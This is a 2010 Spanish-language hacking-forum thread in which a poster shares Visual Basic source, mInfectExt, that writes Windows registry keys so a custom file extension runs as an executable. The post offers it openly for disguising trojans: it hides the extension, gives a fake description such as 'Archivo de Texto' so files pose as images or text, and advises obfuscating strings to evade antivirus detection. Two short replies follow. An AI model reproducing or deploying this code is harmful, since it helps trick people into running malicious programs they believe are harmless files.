elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [SRC] mInfectExt.bas [Infeccion de extensiones]		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [SRC] mInfectExt.bas [Infeccion de extensiones]  (Leído 1,885 veces)
Elemental Code


Desconectado Desconectado

Mensajes: 622


Im beyond the system


Ver Perfil
[SRC] mInfectExt.bas [Infeccion de extensiones]
« en: 24 Julio 2010, 22:41 pm »
Que hace?
Modifica el Registro añadiendo una nueva extensión de archivo

Para que sirve?
Posta esto sirve?
Cualquier tipo de archivo (.wav .jpg .txt ...) puede ser un ejecutable
Sencillamente lo que hacemos es "convencer" al sistema que nuestro archivo "PokebolaVe.jpg" es un ejecutable y que debe ser ejecutado como tal.

Como hace?
Se modifican unos valores en el registro.
Estos son:
(suponiendo que nuestra extensión es .Troj
Código:
HKEY_CLASSES_ROOT\.troj\"trojfile"
HKEY_CLASSES_ROOT\trojfile\"Documento de texto"
HKEY_CLASSES_ROOT\trojfile\"NeverShowExt"=""
HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command\""%1" %*"

Codigo mInfectExt
Código
  1. Option Explicit
  2. ' /-----------------------------------------------------------------------------------\
  3. '|=====================================================================================|
  4. '|=/---------------------------------------------------------------------------------\=|
  5. '|=| Module      : mInfectExt                                                        |=|
  6. '|=| DateTime    : 24/07/2010 05:14 PM                                               |=|
  7. '|=| Author      : Elemental Code                                                    |=|
  8. '|=| Mail        : Elemental_Code[at]hotmail[dot]com                                 |=|
  9. '|=| WebPage     : I haven't got one Yet ^.^                                         |=|
  10. '|=| Purpose     : EDUCATIONAL ONLY code that creates a new extensión in Windows Reg |=|
  11. '|=| Requirements: UAC may Stop you, i dont know >.<                                 |=|
  12. '|=| Distribution: You can freely use this code in your own                          |=|
  13. '|=|               applications, but you may not reproduce                           |=|
  14. '|=|               or publish this code on any web site,                             |=|
  15. '|=|               online service, or distribute as source                           |=|
  16. '|=|               on any media without express permission.                          |=|
  17. '|=\---------------------------------------------------------------------------------/=|
  18. '|=====================================================================================|
  19. ' \-----------------------------------------------------------------------------------/
  20. Public Function InfectExt(Ext As String, Info As String, Ocult as Boolean)
  21.     Dim WS As Object
  22.     Dim FullExt As String
  23.     Dim UniqVal As String
  24.     UniqVal = Ext & "File"
  25.     FullExt = "." & Ext
  26.  
  27.     Set WS = CreateObject("WScript.Shell")
  28.     WS.RegWrite "HKCR\" & FullExt & "\", UniqVal
  29.     WS.RegWrite "HKCR\" & UniqVal & "\", Info
  30.     If Ocult = True Then
  31.         WS.RegWrite "HKCR\" & UniqVal & "\NeverShowExt", ""
  32.     EndIf
  33.     WS.RegWrite "HKCR\" & UniqVal & "\Shell\Open\Command\", Chr(34) & "%1" & Chr(34) & " %*"
  34. End Function
  35.  

Como Usar
lo llamamos y ponemos la extensión (sin el Punto .) y la Descripcion del archivo (traten de que se confunda con otra cosa >.<)
Código
  1. InfectExt "virus", "Archivo de Texto", True


PD: "Encripten" todas las cosas entre comillas ("")para hacerlo indetectable ^.^


Editado, Ahora permite elegir si la extensión queda siempre oculta o no.
« Última modificación: 25 Julio 2010, 18:28 pm por Elemental Code » En línea
I CODE FOR $$$
Programo por $$$
Hago tareas, trabajos para la facultad, lo que sea en VB6.0

Mis programas
Pure Ice

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: [SRC] mInfectExt.bas [Infeccion de extensiones]
« Respuesta #1 en: 25 Julio 2010, 00:15 am »
Había un programa viejo que hacía esto, creaba extensiones que hacían esto
exáctamente... ,  y un bat también se creó.. pero bueno, siempre se agradece
el trabajo no?

Saludos :D
En línea
Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
Re: [SRC] mInfectExt.bas [Infeccion de extensiones]
« Respuesta #2 en: 27 Julio 2010, 00:05 am »
Citar
   
Código
  1. WS.RegWrite "HKCR\" & UniqVal & "\Shell\Open\Command\", Chr(34) & "%1" & Chr(34) & " %*"
No crees que "HKCR\" canta un poco??  :rolleyes:
Aun asi bueno ;)

DoEvents¡! :P
En línea
http://foro.h-sec.org/
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines